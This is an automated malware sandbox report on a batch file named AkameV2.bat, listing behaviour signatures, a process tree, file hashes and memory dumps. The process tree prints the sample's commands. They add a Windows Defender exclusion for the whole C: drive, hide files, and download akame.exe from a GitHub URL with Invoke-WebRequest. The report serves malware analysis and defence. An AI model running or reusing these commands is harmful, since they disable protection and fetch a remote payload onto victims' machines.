Overview

overview

10

Static

static

1

AkameV2.bat

windows7-x64

10

AkameV2.bat

windows10-2004-x64

9

Analysis

  • max time kernel
    54s
  • max time network
    55s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2024 18:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AkameV2.bat

  • Size

    2KB

  • MD5

    f5a3cd3b57b5872f25bc94fabdd6a07e

  • SHA1

    a7235abf2f1ceedca81912ac8315a850e5fd7ffe

  • SHA256

    7749ac8f6e93ad67edb07680727e10001558b469410d979a0fb8ecc6862c4067

  • SHA512

    7fab5482027d94296de1dc8ec7a909533df9a261924807c24fc371fd9b21cc4818cc99e9c225a8b0fa882051fb572e0c0c7316c9200b403cd7129fd6dca12163

Score
10/10
discoveryexecution

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\AkameV2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -window hidden -command ""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1856
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:2832
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2592
      • C:\Windows\system32\attrib.exe
        attrib +h "Anon" /s /d
        2⤵
        • Views/modifies file attributes
        PID:2720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://github.com/kaixabank/mororororo/raw/main/akame.exe' -OutFile akame.exe"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2756
      • C:\Windows\system32\attrib.exe
        attrib +h "C:\Users\Admin\AppData\Local\Anon\akame.exe" /s /d
        2⤵
        • Views/modifies file attributes
        PID:2648
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\BackupSync.gif
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1716 CREDAT:275457 /prefetch:2
        2⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2144
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Program Files (x86)\Microsoft Office\Office14\CLVIEW.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\CLVIEW.EXE" "EXCEL" "Microsoft Excel"
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:1756

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      5d09127c9c5d40daed804d78b3013995

      SHA1

      2c4f7d0e4d45103f7c30e95fe41e86d4fb600a94

      SHA256

      a48594cb0c2e1d9eb2a4b0d80f94ca742a2efa7016e2872ca982bfb4b8fbe1b1

      SHA512

      4051f11111ae07fe8c7786a3b722f36293dc577ea0815786b5cd3f929d4afcf529c2e871130814806150f65d2f3d8dbbfcd78289d43c178685c8616b203804b7

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      e83b416d615d0f38235c50732c6d3132

      SHA1

      5dadec1f12793d3eb636acc23258b400d9821513

      SHA256

      cb9c312c71e2245703fc031104acbb34aaa28206328f8e298aac31df4d9ea350

      SHA512

      ebb1ff8a94aae0367f717df2bde962c7f9c2b1d094abfe792374a9892472f82d734367d9ffd0e20d43edaae8fcae26fcc6518e74d1eb6873d5c37e955a17131c

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      ad650538a768be2fe1e3e658e6f8e427

      SHA1

      6ff02e3135de4d723489562626a4ad365d3e8b23

      SHA256

      ed5b658831e9e3a586b8350c21c668422a3cd7563c37e5ea086c751431f1082f

      SHA512

      1e775f419c487a1bfc45f91778725e83589dc076839a371e4eb0c811ac1ebec481111f3d37efc4a6a810d8c2ddee771f588a897a7ccda87853289d1e24908f9e

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      9ec086cf3a110abacb4b544e52bf0354

      SHA1

      d5290ef087bb2837fab582ae0181211db83ad6a9

      SHA256

      6b6a63a246fa6f7b50d3821ca2cec21e92036ee919fff77ecd0e7f33cf9bdc77

      SHA512

      65be728355b61b9361363040d1a43e79e6ef46de5f111a58db0cfe17cbb5cc544c9b5ff7bc3a0a2a5b82b59577883ef2a48b8a6e13a52e5a4786a2290d84941d

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      479cfcd72f2f968306ee5ca82f78d1be

      SHA1

      a854dea1873fb9c60232ad6d7d4440c8b50fc692

      SHA256

      813841052b2a371db15d110aef688a0ec4c2a7d4a25e3bcd252c0f1ce0aa791c

      SHA512

      713cfec41611a3a8b8d7745562539dfcd6cbbc6c1ed261bab46f47c81b572149b49b60808cd15dae2df22abef4013f4b9046f6f9ce27c9a56c824313ec11f884

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      8173d7f75c7ea3ec0cdad4ea6d66496e

      SHA1

      85d2af462e1c4528d497a7e3767131d1e2a81ced

      SHA256

      17818fa482ddced8f7240700f1fe898b45ed367c5f56c7da402aa45873abd841

      SHA512

      95e450d444ef29ede591439f8c40db4dc030dfb69e5dcddb3031c8cb0c11e6f6c6463707c2cc55630ee625e994d75549202980dc7897678199536fd6655a3386

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      02f5e4485e868a5ba734e6bf5164d20d

      SHA1

      6d19528b3e203f8f2939e000224f82906aa5f56e

      SHA256

      f2c362e4157c43f9a6fa34595bdd4e2c10e2deddffb98892fd6ca6f5a62d83f7

      SHA512

      9825ae2c849ad355840ef1a5da2b2907689e0ad075dcbe2a3b0e541217d72b041976253e6003a1b76921bf3d5c56927cd18cef587b4a9f15c84deb9885adc9b6

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      003a254bd7185845ade35c30a8398dba

      SHA1

      bb004c3a78b2b43413f9a9aa6dec22f417be913f

      SHA256

      40ce36af7ccc4aae31bd35ea8948247ad5814c9297ee6178497d946b5e9b07a5

      SHA512

      635cc50a37b4f96d3b16f4b415cb51765e473df4a1f374fb7c2e34234a1cfdb9e2cb060236fc217807fe6273d4d057ba025b15cad9d686683bc0e96ff1d65b97

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      408830859816abae3468b7d522ffee9c

      SHA1

      0ea6e38e269fa8c90b344a16a850a4524a442ec3

      SHA256

      5dd7faea0c77786d9788abb6344522b81b593f82280d533326210dde710b369d

      SHA512

      22e8bd86ad8511fd8a8a0010be4dd39a806c7eda43d216342962f68b376f0ab0fe088a5bfd1cb01b00ffa6d5d9b8cbcb3bf86e773d84bd811e33c328b8b5ea07

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH9D99.tmp\BROWSE0.EXCEL.xml
      Filesize

      19KB

      MD5

      812bc4916aad60ad69c7f141ef52625c

      SHA1

      d955ac30d40a2bc09c15111f53b467d6bc82fcb5

      SHA256

      2bf52dc5f13f06ece829f19396d6dc81d01ae47e8c4cd857a6e0466ed92666c7

      SHA512

      43bbf82d1c6f22c75f30c1aa5da64429e00ca3dbf9570a199bb71f9a3cf106c8551c246c459785b7fd378d69a336c87769110552ec208e6189b23866ccf9bb84

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH9D99.tmp\ClientViewerSettings.xml
      Filesize

      7KB

      MD5

      88fbdbf0b8ed30038abb141e26ad42b6

      SHA1

      e867446eeef83f11ec0b9c3fee7499442923d9a3

      SHA256

      63a2227b104139265e9d2f43e5e4c8c61aabcd92ffee838fbbe18e987e911c68

      SHA512

      e3924be97958268b1ed49e396965b901121ac4c1c04e8fbc209517b00c9f2de386c821703e31a7d85383055f381a0191a59f0aad159b94e5071a81325eb4d25d

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH9D99.tmp\cvglobal.xsl
      Filesize

      1KB

      MD5

      048efa38358f297327024f7f90928ee5

      SHA1

      7e0a2c3105f0ddc01479151e416ca0873c00fee0

      SHA256

      9004e1b028764e0e482fb273c16649d3282be74e9212e6332be10b294eca3312

      SHA512

      a8fc4ca631c5f70427decdfd47576fbcfc5f47fe5230eca68ad85df2057d8667593885912c46d8484f1e5afbe405e67f339d3b94d8a8400d045de83be5b44571

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH9D99.tmp\cvglobalstrings.xml
      Filesize

      6KB

      MD5

      3548b520874395a9cbce22d15e9068d8

      SHA1

      8c41b481f96d12ccdf9e20fb4049ca9efd60ca19

      SHA256

      31f2fa759ed6862569f7c68aed874053ebcfb4e27c74476a0fd3aa1e3af818d6

      SHA512

      f9b10d94a163d8e8f21b264c640498720e8ddc4323de59e00dd0d2bac8f549182a7a5fe4951ebd2c5d3eedba84788aa111ff6c3906357b060860795951596a99

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH9D99.tmp\script.js
      Filesize

      2KB

      MD5

      e72eebc1eb449513d28447f352406330

      SHA1

      058cdd329da5ca2d9d583f0f892260932a026c05

      SHA256

      e78f14923030e2e817fab024e72482d72aa14f3dcaef66f3a2c6825d6a29b305

      SHA512

      c219af4b6dc166aecef727f2de78b34485a2331c409fc99c70077c1796b3b0fc1d6797e79f5e8be615371a969f279c4859dde6d7d701ec586aecc6d4e627150f

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MsOfficeHelp14\MOH9D99.tmp\toc.xsl
      Filesize

      6KB

      MD5

      26de67342be3c52d20d0c152fae1f843

      SHA1

      15536c7bf9cc5763253893d9ba2025ebb7c1eb19

      SHA256

      5e65cb6e32a25b91b80b19317d93d76ce5222b565f8f495a01149e82a90beef7

      SHA512

      22a1e0006070283ab132bd4c7ee953db86eb1d803589fdda1a44367e495e21912ace0cc22657487e9d11e7b1428a398072bf19bfa0ca4a15d16ed1a490066557

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab8A19.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar8A8A.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      f52f6899a5bc79b386fe43b2f8d53514

      SHA1

      277e9025492c7483921eee80aa34c017acc74ca0

      SHA256

      35672cf947354a4f23831c9a11ad1b16c770193250b2aac67c8b146c335256af

      SHA512

      8dfd6bb2df3d78c3908c7fe5fb1d9c525361d5a919c322cf2664436d3d7a0051caf3aedfc08450b2f141cb4a8b3200ef2d0e40e8caa3bb85ebcebfb74d3c8bfa

      Download Submit

    • memory/1856-10-0x0000000002D8B000-0x0000000002DF2000-memory.dmp

      Filesize

      412KB

      Download

    • memory/1856-12-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-4-0x000007FEF536E000-0x000007FEF536F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1856-11-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-9-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-8-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-7-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-6-0x0000000001F40000-0x0000000001F48000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1856-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2592-19-0x0000000002860000-0x0000000002868000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2592-18-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/3000-286-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download